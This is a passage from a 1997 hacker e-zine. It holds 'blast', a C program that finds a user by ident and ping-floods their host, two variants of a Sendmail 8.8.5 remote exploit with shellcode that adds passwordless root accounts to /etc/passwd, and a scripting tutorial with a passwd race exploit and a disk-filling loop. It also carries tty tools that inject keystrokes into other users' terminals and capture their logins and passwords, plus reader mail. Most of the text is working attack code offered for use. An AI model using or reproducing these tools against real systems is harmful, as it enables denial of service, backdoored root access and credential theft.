-DEMO- (woo~)$cc -o blast blast.c (woo~)$blast -*-A hardcore blaster for aol kidz by memz/hbs-sjta -1997- -*-ident of the victim please:fuckerlame -*-(isp) ip.ip.ip of the victim please:195.155.38 -*-Packet Size of ICMP (will be *5):5000 Scanning 195.155.38.1 - -/-Now Closing Connection.. Scanning 195.155.38.2 - -/-Now Closing Connection.. (...) Scanning 195.155.38.255 - -/-Now Closing Connection.. Scanning 195.155.38.1 - -/-Now Closing Connection.. Scanning 195.155.38.2 - -/-Now Closing Connection.. (...) control + c when you want it to end.. How do you protect against it? For the poor people getting blasted by this... Change ident regularly.. (your eleet++ pirch/mirc options) or Run linux.. or Don't run an ident.. but somes ircd will want it, so you could be screwed or Write the root of the isp ICMPing you about your being victimized In conclusion... If you want to improve the program do it.. first off, reduce the bugs because I don't check any strlen of data strings (the ones that you fill with the scanf for instance..). Secondly, before connecting the host, I don't ping it.. you could do that to speed up the scanning procedure. Thirdly, put the global vars in local, 'cause global is kinda lame, but I'm lazy#!@ Fourthly, if you are some lamer who knows some root bugtraq exploits, add in the line sprintf(...,"ping -c %s ....",...); a -f for more blasting efficiency.. it would give sprintf(...,"ping -f -c %s ...",...); Lastly, programming a companion attacker to do several different types of DoS attacks at once would be interesting. Have fun.. memor */ /* includes for sockets, present,... 
*/ #include <stdio.h> #include <stdlib.h> #include <netdb.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/types.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> /* Global vars because I'm too lazy to transmit parameters between functions */ FILE *soc; int sock; int cmpt; char varident[255]; char iptoshoot[255]; char tailleicmp[25]; char varip[255]; char query[1024]; char Buffer[1024]; struct sockaddr_in ip; struct hostent *hos; /* functions used */ void answer(); void scanning(); void choiceipicmpident(); void icmpip(); int ishealive(); /* main function */ void main() { choiceipicmpident(); scanning(); } /* choosing ident, ip.ip.ip and packetsize to blast the potential victim... */ void choiceipicmpident() { printf("-*-Some hardcore blaster for aol kidz by memz/hbs-sjta -1997-\n"); printf("-*-ident of the victim please:"); scanf("%s",varident); printf("-*-(isp) ip.ip.ip of the victim please:"); scanf("%s",varip); printf("-*-Packet Size of icmp (will be *5):"); scanf("%s",tailleicmp); } /* scanning functions.. scan forever for the victim, and when found, call icmpip() */ void scanning() { cmpt=0; while(1) { cmpt++; if(cmpt==255) cmpt=1; sprintf(iptoshoot,"%s.%d",varip,cmpt); printf("Scanning %s - ",iptoshoot); hos = gethostbyname(iptoshoot); bzero((char *)&ip,sizeof(ip)); bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length); ip.sin_family=hos->h_addrtype; ip.sin_port=htons(113); if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) { perror("socket"); } else { if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) > -1 ) { printf("-/-Querying IP,Ident Port..\n"); sprintf(query,"1,1\n\0"); if ( send(sock, query, strlen(query), 0) < 0 ) { perror("send"); exit(1); } printf("-/-Query sent\n"); answer(); printf("-/-Receive Analysis:\n"); printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]); printf("-/-Is he the person to Kill? 
->"); if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0) { printf(" He is the person to Kill..\n"); icmpip(); } else { printf(" Bad Target, back to scanning\n"); } } printf("-/-Now Closing Connection..\n"); close(sock); } } } /* icmpip() function called by scanning() one will ICMP the victim and after 5 mins waiting (you can reduce the wait time, I guess.. lame sleep(int) hm..), calling function ishealive() to see if the "blast" was effective.. and ICMP again and again if it wasn't.. */ void icmpip() { int killed; int cpt; char commande[1024]; killed=0; do { sprintf(commande,"ping -c 50 -s %s %s &",tailleicmp,iptoshoot); for(cpt=0;cpt<5;cpt++) system(commande); sleep(5*60); killed=ishealive(); }while(killed==0); } /* function called by icmpip() one and return 0 if the victim is not dead to make the function icmpip() continue to try to kill and return 1 if the victim was dead, for scanning() continues */ int ishealive() { int killen; killen=0; hos = gethostbyname(iptoshoot); bzero((char *)&ip,sizeof(ip)); bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length); ip.sin_family=hos->h_addrtype; ip.sin_port=htons(113); if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) { perror("socket"); } else { if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) < 0 ) { printf("-/-Target DEAD, back to scanning@#\n"); killen=1; } else { printf("-/-Querying IP,Ident Port..\n"); sprintf(query,"1,1\n\0"); if ( send(sock, query, strlen(query), 0) < 0 ) { perror("send"); exit(1); } printf("-/-Query sent\n"); answer(); printf("-/-Receive Analysis:\n"); printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]); printf("-/-Is he the person to Kill? 
->"); if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0) { printf(" Target STILL ALIVE, CONTINUE ICMP@#\n"); killen=0; } else { printf(" Target DEAD, back to scanning@#\n"); killen=1; } } printf("-/-Now Closing Connection..\n"); close(sock); } return killen; } /* function answer, only receive the identd server answer in a lame global var.. */ void answer() { int i; char ch; soc=fdopen(sock, "r"); i=0; do { ch=getc(soc); Buffer[i]=ch; i++; } while(ch!='\r' && ch!=-1); Buffer[i-1]='\0'; fclose(soc); } /* good luck.. memor 1997 for thtj18 */ [sendmail885.c...........................................................su1d] /* carparts original k0d3d by su1d */ /* yeah like, we get k-rad on your */ /* fuckin ass's, and like you must */ /* be root in order to open up */ /* privladged ports, so like su */ /* root whores. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <net/if.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #define NOP 0x90 /* DO NOT CHANGE - SIZE COMPUTED */ char shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff"; /* DO NOT CHANGE - SIZE COMPUTED */ char commands[] = "/bin/echo \"n0tr00t::1000:1000:n0tr00t:/:/bin/bash\" >> /etc/passwd\n" "/bin/echo \"r00t::0:0:r00t:/:/bin/bash\" >> /etc/passwd\n"; int main ( int argc, char **argv ) { int i; int sock; char *ptr; char *clear; char buf[8192]; struct sockaddr_in sin; struct hostent *hp; if(argc<2) { printf("READ COMMENTS\n"); exit(-1); } ptr = buf; for(i=0;i<=4096;i++) buf[i] = NOP; ptr += i; memcpy(ptr,shellcode,sizeof(shellcode)); ptr += sizeof(shellcode); clear = commands; memcpy(ptr,clear,sizeof(commands)); ptr += sizeof(commands); memcpy(ptr,"3824",4); system(clear); printf("CONNECTING TO %s\n",argv[1]); hp = gethostbyname(argv[1]); if(hp==NULL) { printf("UNKNOWN HOST\n"); exit(-1); } 
bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); "/bin/echo \"heh | mail Banshee@evil-empire.com"; sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); send(sock,buf,sizeof(buf),0); close(sock); printf("EXPLOIT SUCCESSFULLY EXECUTED\n"); return(0); } [sendmail885.c (2)......................................................scud_] Note: Read the header. This code is all based on su1d's original code, but modified slightly for user friendlyness, and less of a risk of discovery. /* sendmail885.c * Sendmail 8.8.5 remote/local (if you use localhost for the host) * exploit. Could be exploitable on other versions. * * carparts original code by su1d * * Modified slightly by scud_ <scud@thtj.com> * - Fixed a few things I felt might get you discovered very fast * - Also made this program a wee bit more user friendly * * Try gcc -o sendmail885 sendmail885.c to get this to compile */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/in.h> #include <net/if.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #define NOP 0x90 /* DO NOT CHANGE - SIZE COMPUTED */ char shellcode[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff"; /* DO NOT CHANGE - SIZE COMPUTED */ /* Carparts original set the shell to /bin/bash, I changed this to tcsh, since tsch doesnt have a log, but all of this *really* doesnt matter much. However, a sysadmin seeing a .bash_history file in / would not be a good thing. You could also just ln the history file to /dev/null */ /* Carparts original set the 2 new accounts to 'n0tr00t' and 'r00t'. This may be fine, but if a sysadmin did a who list and sees that, what do you think his next command will be? 
   I left the r00t, but modded n0tr00t to stephen, since stephen sounds
   like such an innocent user. */
char commands[] =
"/bin/echo \"stephen::1000:1000:Stephen:/:/bin/tcsh\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/tcsh\" >> /etc/passwd\n";

int main ( int argc, char **argv )
{
  int i;
  int sock;
  char *ptr;
  char *clear;
  char buf[8192];
  struct sockaddr_in sin;
  struct hostent *hp;

  if(argc<2) {
    /* Carparts original error message was a bit cryptic */
    printf("Usage: %s site.to.exploit\n", argv[0]);
    exit(-1);
  }

  ptr = buf;
  for(i=0;i<=4096;i++) buf[i] = NOP;
  ptr += i;
  memcpy(ptr,shellcode,sizeof(shellcode));
  ptr += sizeof(shellcode);
  clear = commands;
  memcpy(ptr,clear,sizeof(commands));
  ptr += sizeof(commands);
  memcpy(ptr,"3824",4);
  system(clear);

  printf("Connecting To %s\n",argv[1]);
  hp = gethostbyname(argv[1]);
  if(hp==NULL) {
    printf("Unknown Host\n");
    exit(-1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  send(sock,buf,sizeof(buf),0);
  close(sock);
  printf("Exploit Successfully Executed\n");
  return(0);
}

[Scripting in UNIX....................................................Nartrof]

There are two basic skills that are necessary for every UNIX hacker to learn. They are C programming and UNIX shell scripting. A UNIX shell script is merely a file that contains a series of UNIX shell commands. However, through the use of various control structures a shell script can become a very powerful tool.

The first line in any shell script should declare which shell the script is to be executed in. For example:

#!/bin/sh

The Bash shell is the shell that is normally used for scripting. Once upon a time there were bugs in the C shell that led many people to become wary of and dislike it. The bugs have been fixed years past, but the dislike and the wariness remain.
After the shell has been declared, comments should be used to explain the purpose of the script. Comments are preceded with a pound sign. This is not to be confused with the execution shell, which is declared with a pound sign and exclamation mark. For example:

--------------------------- cut here ---------------------------
#!/bin/sh
# This line declares what this script does.
# However this script doesn't do anything yet.
--------------------------- cut here ---------------------------

After the script's purpose has been stated, command execution begins. The next script makes use of the grep utility. grep is one of my favorite UNIX utilities, which can be used for various different searching purposes. I often use it to search for certain types of files and user accounts. The next script uses the grep utility to find accounts with a user or group ID of 0:

--------------------------- cut here ---------------------------
#!/bin/sh
# This script finds UID and GID 0 accounts.
grep ':00*:' /etc/passwd
--------------------------- cut here ---------------------------

To execute the script you will have to make it executable. You can do this by using the following command at the shell prompt:

chmod 755 scriptname

The script is executed by typing its name and path at the shell prompt. If we also wanted to find unpassworded accounts we could also include the following command line in the script:

grep '^[^:]*::' /etc/passwd

The next script will perform a search for both UID 0 and unpassworded accounts and separate the output:

--------------------------- cut here ---------------------------
#!/bin/sh
# This script finds UID & GID 0 accounts and unpassworded accounts.

# This will find GID & UID 0 accounts
echo "The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd
echo ""

# This will find unpassworded accounts.
echo "The following accounts have no password."
echo ""
grep '^[^:]*::' /etc/passwd
--------------------------- cut here ---------------------------

Notice that in the previous script I used comments to explain what each part of the script does. This is a very important part of scripting and programming. Comments allow others to understand what you write and help you to remember what each part does. This is especially important as your scripts and programs become longer and more complicated.

In the example of the previous script it may be desirable to have the script not print out the root account as UID 0. You should already know this and you may not want to bother with it on your screen. If so you could write the script as follows:

--------------------------- cut here ---------------------------
#!/bin/sh
# This script finds UID & GID 0 accounts and unpassworded accounts.

# This will find GID & UID 0 accounts
echo "The following accounts have User or Group privileges of 0."
echo ""
grep ':00*:' /etc/passwd | \
awk -F: 'BEGIN {n=0} $1!="root" {print $0 ; n=1} END {if (n==0) print "No accounts were found."}'
echo ""

# This will find unpassworded accounts.
echo "The following accounts have no password."
echo ""
grep '^[^:]*::' /etc/passwd
--------------------------- cut here ---------------------------

The awk utility is a powerful scripting language that many UNIX gurus use to perform a variety of functions. The snippet of awk script in the previous example removes the root account from the grep listing and prints out the other accounts in the listing. If no accounts were found to be UID 0 then it tells you "No accounts were found."

Another use for a shell script might be to search for programs with SUID privileges. SUID programs are often exploited to gain root privileges through buffer overflows and other problems. Which files will be exploitable on any system depends on the operating system that is running on the computer. SUID files can be found using the find command.
For example:

find / \( -perm -2000 -o -perm -4000 \) -print

This command line will find both SetUserID and SetGroupID privileged programs. If you were looking for certain files to see if they were present with SUID privileges you could redirect find's output to grep, as in the following script.

--------------------------- cut here ---------------------------
#!/bin/bash
# This script will be used to find SUID programs on a system. It will also
# redirect the output of its search to grep. grep will search for the
# program orwell, which you know to be exploitable.
echo "The following program is SUID and is known to be exploitable."
echo ""
find / \( -perm -2000 -o -perm -4000 \) -print | grep 'orwell'
--------------------------- cut here ---------------------------

While the scripts demonstrated so far are simple and don't do much more than you could easily do by hand, the UNIX shell does support a number of control structures. One of the most widely used control structures is the while-do loop. The while-do loop takes the form

while [condition]
do
  [command]
  [command]
done

What the while-do loop does is repeat the commands listed between do and done for as long as the condition holds. The most common way to use this loop is to assign a value to a variable and to end the loop when that variable reaches another, different, value. If, for example, your script increased the variable COUNT by 1 when it finished successfully, then you could use the while-do loop to execute the commands in your script until COUNT is no longer equal to its initial value. Note that the condition is a command whose exit status is tested, so it has to be a real test such as [ "$COUNT" -eq 1 ]; a plain assignment like COUNT=1 always succeeds and would never end the loop.

--------------------------- cut here ---------------------------
COUNT=1
# COUNT now equals 1
# The loop will now start. It will end when COUNT is no longer equal
# to 1.
while [ "$COUNT" -eq 1 ]
do
  .... the other commands in your script ....
done
--------------------------- cut here ---------------------------

When COUNT is no longer equal to 1 the loop will stop.
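As an added example (not part of Nartrof's article), here is the same account and SUID audit written as a set of POSIX sh functions. It checks a constructed passwd file instead of /etc/passwd, uses awk field tests so that only the real UID and GID fields can match (the ':00*:' grep pattern matches a ":0:" anywhere on the line), and drives its counter with a proper [ ... ] test in the while loop. The sample accounts, the temporary directory, and all function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example for the scripting article: an account/SUID audit split into
# shell functions so each check can be reused or tested on its own.
# The passwd file below is CONSTRUCTED for the example; in real use pass
# /etc/passwd (and a real directory to suid_files) instead.

SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
stephen:x:1000:1000:Stephen:/home/stephen:/bin/sh
r00t::0:0:r00t:/:/bin/sh
guest::1001:1001:Guest:/home/guest:/bin/sh
backup:x:34:0:backup:/var/backups:/usr/sbin/nologin
EOF

# Accounts other than root whose UID (field 3) or GID (field 4) is 0.
# awk -F: compares the actual fields, so a "0" elsewhere on the line
# (for example inside the GECOS field) cannot produce a false match.
uid0_accounts() {
    awk -F: '$1 != "root" && ($3 == "0" || $4 == "0") { print $1 }' "$1"
}

# Accounts whose password field (field 2) is empty: the '^[^:]*::' case.
nopass_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Set-UID or set-GID regular files below a directory, one path per line.
suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print
}

# Count the lines on stdin with a while loop.  The loop condition is the
# exit status of the read command, which is why the article's original
# "while COUNT=1" (an assignment that always succeeds) could never end.
count_lines() {
    n=0
    while IFS= read -r line; do
        n=$((n + 1))
    done
    echo "$n"
}

# Print the whole report for one passwd file and one directory tree.
audit_report() {
    printf 'UID/GID 0 accounts other than root (%s):\n' \
        "$(uid0_accounts "$1" | count_lines)"
    uid0_accounts "$1"
    printf '\nAccounts with no password (%s):\n' \
        "$(nopass_accounts "$1" | count_lines)"
    nopass_accounts "$1"
    printf '\nSUID/SGID files under %s:\n' "$2"
    suid_files "$2"
}

# Demo on constructed input: a temporary tree holding one set-UID file.
SAMPLE_DIR=$(mktemp -d)
: > "$SAMPLE_DIR/plain"
: > "$SAMPLE_DIR/setuid-tool"
chmod 4755 "$SAMPLE_DIR/setuid-tool"
audit_report "$SAMPLE_PASSWD" "$SAMPLE_DIR"
```

On the sample file the report lists r00t and backup as UID/GID 0 accounts (root itself is skipped) and r00t and guest as accounts with no password; swapping SAMPLE_PASSWD for /etc/passwd and SAMPLE_DIR for / gives the real audit.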
The while-do and other types of loops used in UNIX are very powerful for usage as programming tools. At one time, however, they were frighteningly dangerous hacking tools. The following script, for example, would cause the password file to be owned by the user who ran the script.

--------------------------- cut here ---------------------------
#!/bin/bash
# This script would cause the password file to be owned by you.
# This should only work on older UNIX boxes.
# This script exploited a race condition that occurred when mkdir attempted to
# perform the two different functions required to create a new directory.
# This script creates a directory called 'crap'. It then immediately removes
# it. The script creates a race condition that eventually causes the
# directory to be replaced by a link to /etc/passwd. /etc/passwd then
# becomes owned by you. If this still works the box is old.
while : ; do
  nice -10 (mkdir crap; rm -fr crap) &
  (rm -fr crap; ln /etc/passwd crap) &
done
--------------------------- cut here ---------------------------

The same type of loop was also used to crash systems by creating a kernel panic or using all of the available blocks on the hard disk. If disk quota is not enabled the following loop will still work. It's nasty, but if you just owned some punk's box and feel like giving him a rough time....Enjoy!

--------------------------- cut here ---------------------------
#!/bin/bash
# This script is lame but it does fit the topic of while-do loops so you make
# the call.
while : ; do
  mkdir ms-sucks
  cd ms-sucks
done
--------------------------- cut here ---------------------------

The previous two scripts do their dirty work through the use of endless or non-terminating loops. Endless loops are often used by newbies to crash systems and wreak havoc, but that is very likely to encourage a commercial system to spend more money to catch you, so watch out. You should, however, understand the concept of both endless and conventional while-do loops.
There are quite a few other UNIX control structures available and I do hope to cover them in the next issue of THTJ. For now try to experiment with what I covered here. Invent something new and be creative. Once you reach the point of dreaming in UNIX, shell scripting will be a powerful tool which you can use to create your own exploits. Exploits are usually system specific, otherwise I would have included a few here. Be creative, create your own bugs and wreak havoc (on your own system of course). Until then ta,ta.

-=*Nartrof*=-

/* Greetz go out to BlakAngel, TdLord, Iceburg, WyseGuy, Dovee, Kara, Oxygen,
   T1, ac|ds, Astra, Oxygen, Coredata, Warpy, Pentium, Pan51, Nalius,
   Confinest and Ct2 */

[ttyread.c and ttywrite.c...............................................simon]

/* ttywrite.c - by simon <simon@yahoo.com> part of my tty suite
 *
 * This program bypasses the normal superuser check for stuffing chars
 * into other people's terminals. All you need is write permission on
 * the user's terminal.
 */

#include <sgtty.h>
#include <stdio.h>

main(argc, argv)
char **argv;
{
  register int fd;        /* file descriptor */
  char ch;                /* current character */
  char name[100];         /* tty name */
  struct sgttyb sb;       /* old and new tty flags */
  struct sgttyb nsb;

  if (argc < 2) {
    fprintf(stderr, "ttywrite ttyname\n");
    exit(1);
  }
  argv++;
  if (**argv == '/')
    strcpy(name, *argv);               /* build full name */
  else
    sprintf(name, "/dev/%s", *argv);

  if (setpgrp(0, 0))                   /* clear my process group */
  {
    perror("spgrp");
    goto done;
  }
  if (open(name, 1) < 0)               /* open tty, making it mine */
  {
    perror(name);
    exit(1);
  }
  fd = open("/dev/tty", 2);            /* open read/write as tty */
  if (fd < 0) {
    perror("/dev/tty");
    exit(1);
  }
  ioctl(0, TIOCGETP, &sb);             /* go to raw mode */
  nsb = sb;
  nsb.sg_flags |= RAW;
  nsb.sg_flags &= ~ECHO;
  ioctl(0, TIOCSETN, &nsb);
  sigsetmask(-1);                      /* stop hangups */
  printf("Connected. Type ^B to exit\r\n");
  while (1) {
    if (read(0, &ch, 1) <= 0)
      break;
    if ((ch & 0x7f) == '\002')
      break;
    if (ioctl(fd, TIOCSTI, &ch))       /* stuff char on "his" tty */
    {
      perror("\r\nsti failed\r");
      goto done;
    }
    ch &= 0x7f;                        /* echo it for me */
    if (ch < ' ') {
      if ((ch == '\r') || (ch == '\n')) {
        write(1, "\r\n", 2);
        continue;
      }
      ch += '@';
      write(1, "^", 1);
      write(1, &ch, 1);
      continue;
    }
    if (ch == '\177') {
      write(1, "^?", 2);
      continue;
    }
    write(1, &ch, 1);
  }
done:
  ioctl(0, TIOCSETN, &sb);             /* reset tty */
}

------------------------------------------------------------------------------

/* ttyread.c - by simon <simon@yahoo.com> part of my tty suite
 *
 * This will read stuff off of other user's tty.
 */

#include <stdio.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/termios.h>

#define DEBUG 1           /* Enable additional debugging info (needed!) */
#define USLEEP            /* Define this if your UNIX supports usleep() */

#ifdef ULTRIX
#define TCGETS TCGETP     /* Get termios structure */
#define TCSETS TCSANOW    /* Set termios structure */
#endif

handler(signal)
int signal;               /* signalnumber */
{
  /* do nothing, ignore the signal */
  if(DEBUG) printf("Ignoring signal %d\n",signal);
}

int readandpush(f,string)
FILE *f;
char *string;
{
  char *cp,*result;
  int e;
  struct termios termios;

  result=fgets(string,20,f);           /* Read a line into string */
  if (result==NULL) {
    perror("fgets()");
    return(1);
  }
  if (DEBUG) {
    printf("String: %s\n",string);
    fflush(stdout);
  }
  ioctl(0,TCGETS,&termios);            /* These 3 lines turn off input echo */
  /* echo = (termios.c_lflag & ECHO); */
  termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
  ioctl(0,TCSETS,&termios);
  for (cp=string;*cp;cp++)             /* Push it back as input */
  {
    e=ioctl(0,TIOCSTI,cp);
    if(e<0) {
      perror("ioctl()");
      return(1);
    }
  }
  return(0);
}

main(argc,argv)
int argc;
char *argv[];
{
  /* variables */
  int err;
  FILE *f;
  char *term = "12345678901234567890";
  char *login = "12345678901234567890";
  char *password = "12345678901234567890";

  if (argc < 2) {
    printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
    printf("Enter ttyname: ");
    gets(term);
  }
  else
    term=argv[argc-1];

  signal(SIGQUIT,handler);
  signal(SIGINT,handler);
  signal(SIGTERM,handler);
  signal(SIGHUP,handler);
  signal(SIGTTOU,handler);

  close(0);                            /* close stdin */
#ifdef ULTRIX
  if(setpgrp(0,100)==-1) perror("setpgrp:");  /* Hopefully this works */
#else
  if(setsid()==-1) perror("setsid:");  /* Disconnect from our controlling TTY
                                          and start a new session as sessionleader */
#endif
  f=fopen(term,"r");                   /* Open tty as a stream, this guarantees
                                          getting file descriptor 0 */
  if (f==NULL) {
    printf("Error opening %s with fopen()\n",term);
    exit(2);
  }
  if (DEBUG) system("ps -xu>>/dev/null &");
  fclose(f);                           /* Close the TTY again */
  f=fopen("/dev/tty","r");             /* We can now use /dev/tty instead */
  if (f==NULL) {
    printf("Error opening /dev/tty with fopen()\n");
    exit(2);
  }
  if(readandpush(f,login)==0) {
#ifdef USLEEP
    usleep(20000);                     /* This gives login(1) a chance to read the
                                          string, or the second call would read the
                                          input that the first call pushed back ! */
#else
    /* for(i=0;i<1000;i++) err=err+(i*i);  Alternatives not yet implemented */
#endif
    readandpush(f,password);
    printf("Result: First: %s Second: %s\n",login,password);
  }
  fflush(stdout);
  sleep(30);                           /* Waste some time, to prevent that we send
                                          a SIGHUP to login(1), which would kill the
                                          user. Instead, wait a while. We then send
                                          SIGHUP to the shell of the user, which
                                          will ignore it. */
  fclose(f);
}

[The Mailroom...........................................................scud_]

*NOTE*: From now on, all e-mail addresses and message headers will be ripped out of the e-mail before being released into the Mailroom! Now you can feel free to e-mail us and not have millions of flame mails waiting for you the next time you open your e-mail!

---

Whatz up. Have a nice day

[The Sky.]
While others may argue about whether the world ends with a bang or a whimper, I just want to make sure mine doesn't end with a whine.

Help! i am za beginner hacker and i need help on how to hack.. i need detailed info on how to hack or some addresses might help me a lot. Please can you help me i only hacked into something once by accident!
--Barbara Gordon

[ Well, until Havoc Bell Systems releases their guide to hacking, look at hackkit by i-e. You can find it on rootshell.com, or possibly at thtj.com ]

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com

[No, no I don't.]

---

I want a scanner.

[ I want a BMW M3. ]

---

I am kinda new into the world of hacking. My local library has a BBS and i have 250 dollars worth of outstanding fines. how can i hack the system? I was also wondering if I could be part of your web page or something. e-mail me back

[ 1. How the fuck did you manage to get $250 worth of fines?
  2. Well, you need to be a *little* more specific on what type of BBS this library runs.
  3. THTJ doesn't bother with BBSes anymore, most people have moved to the Internet.
  4. Part of my web page? What do you mean? ]

---

was hackers here, seems there is nothing after the big "Freez..", well gotta run, sure miss the old one.......

[ SNeitz, what the fuck is this 'Freez' you keep speaking of? ]

---

Just wanted to tell u guys that u r the greatest. the best zine i have ever read. None of that newbie guide shit. Just clear concise info. Luv it man. Don't ever stop.

[ We aim to please. ]

---

Hello I was wondering if u can answer a question for me. Well I heard that its possible to enter someone's hard drive through telnet, i would like to know if this is true and if it is how would I go about doing it. Or are there other programs that can do it besides telnet.
Thanks,
LogX
albender@geocities.com

[ Anything is possible.
It all depends on several variables, which I will leave for you to find out. ]

---

my x gf is pissing me off. is there any way i can hack into her comp through my tcp/ip connection. if there is please send me instructions on how to. thanx
** *******

[ If there is a will, there is a way. Find out that way yourself. ]

---

In thtj16, [which i very much enjoyed] i noticed your article about NetBIOS attacks and such.. Well i found that each time i tried it said NBT DRIVER 1 NOT FOUND, so in turn screwing up readers. Well, you really should put in thtj 18 or something that you have to ENABLE NetBIOS in TCP/IP networking settings. Just to let ya know
Ld

[ Thanks for passing along the info. ]

---

Why aren't you taking any members

[ Because we dont want AOLers such as yourself bugging us about joining. So, we closed our doors, and you have ruined it for everyone else. ]

---

hi i want to learn how to hack. I've spent hours searching the net, and all i am getting is bits and pieces of how to hack a Unix. I am learning dick all. can you email me and tell me step by step what i need to do to start hacking. i would be most grateful, if you can't can you at least email me at pparker@cyberlink.bc.ca and refer me to a really good site that will teach me everything i need to know. i really want to learn to hack. maybe you could email me once a week with lessons on how to hack, starting at the beginning. anyway thank you for reading this but could you please email me back. thanks :-)

[ Lessons? Hacking 101 is a self taught class. Go find hack_kit2.0 and read it for an intro to hacking. ]

---

Hey Scud, I like your zine. Just wanted to make a comment that I think that maybe you should write the journal in HTML format. It would add a lot to the zine, I'm sure u know of the advantages. Thanks, keep it up. BTW, PGP public key?
nakar

[ After issue 6 it was too much work to convert 150+ k of text to HTML, so we stopped making thtj in HTML.
If one of you out there wants to do it, by all means go ahead and let us know. ]

---

Dear Scud-0,
I would like to say your mag rocks!!! also do you know how to cause a little havoc at certain stores? if you know the following just pass the info along: at certain chain stores (or stores with computers on display like Wal mart, K mart, etc) you can get past the password on the screen saver by pressing Ctrl+Alt+Delete and tell it to end the screen saver, or you can sometimes press Alt+Tab to goto the next open window
till my next letter
happy hacking
Whisper Death
@-}--------

---

I need programs but everything is a zip file. where can I find exe files to use? Or how can I change my computer to use zip files?
just asking for help, thanks
SAINT

[ You want to be a hacker and you cant figure out how to use zip files? ROFLOL (ten minutes of laughing) Look up winzip or pkzip on the world wide web. ]

---

Subject: NBC News 12/14/97

Was it me or was that guy in the report on "cyber crime" "hacking" with Microsoft Word?

[ I dont know, I missed the show, but most likely it was Word, if NBC ran it.]

---

Hello, I'm looking for a "punter". I understand that they are typically against aol TOS regulations, but in a room that was being torn apart by fools, an AOL guide was asked about them. She said she could support their use in only the most unbearable circumstances. That certainly can happen. Can anyone tell me how to acquire one...or a direction to begin? Appreciate any help.
Josh.

[ Nope, I cant tell you, I dont use AOL.]

---

hey what's going on in cyber space there is nothing to do tonight. so I'm on the net with my friends to see what we can get into., got any pointers to give to a new hacker wanna be? if so email me back, all the info will be very useful in my boring life
laters
mogul

[ Yea, the inet is pretty boring. Make it more lively by getting hack-kit2.0 from rootshell.com and try out some of the code and methods they use, it should hopefully make things more fun for you.
]

---

I'm looking to find new friends in the columbus, cincinnati, ohio area. Thank you in advance for your reply.
Yogi4069

[ what the fuck? since when did thtj become a dating service? Ok, Yogi was only asking for friends, but thtj is not a friends network, it is a zine. oh well, consider it done. ]

---

I would like to learn how to become a very good hacker.. I've looked all over, and went to hacker dot com. That is where I came across your link. I would like to become as good as you guys. If you are willing to teach me bit by bit, please email me back.

[ Go get hack-kit2.0 like i told everyone else to. ]

---

If you know any hackers/phreaks from the 813 area code please have them contact me at: axessphreak@most-wanted.com

[ consider it done. ]

---

I AM ON MY SISTERS SCREEN NAME. BECAUSE MY DAD HAS ME LOCKED OUT. I HUMBLY ASK FOR SOME HELP IN THIS LOCK OUT MATTER. ANY SUGGESTIONS PLEASE REPLY TO SAAFIR21@AOL.COM

[ NEXT TIME DONT WRITE IN ALL CAPS!! ]

---

Hey! I've heard from friends that you wanted to know what HAVOC: THE PROGRAM is. Well, I needed a lot of encouragement, but I am now willing to say that I AM THE WRITER OF HAVOC: THE PROGRAM. If you want to find out more about it, e-mail me at Xabbu@hotmail.com. By the way, I love your zine!
!Xabbu

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

[ woo hoo. Im overjoyed. Next time just send me the facts. I can barely contain my excitement. ]

---

